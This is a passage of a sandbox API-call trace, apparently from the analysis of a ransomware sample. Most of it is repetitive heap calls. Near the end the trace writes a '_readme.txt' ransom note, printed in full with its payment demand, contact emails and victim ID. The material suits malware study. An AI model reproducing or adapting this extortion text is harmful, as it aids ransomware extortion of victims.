RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.636] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.636] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.637] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.637] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.639] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.639] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.643] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0228.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.643] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.643] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.643] PathFindFileNameW (pszPath="") returned="" [0228.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.643] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.643] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.643] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.644] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.644] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0228.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.644] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0228.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.645] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.645] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your 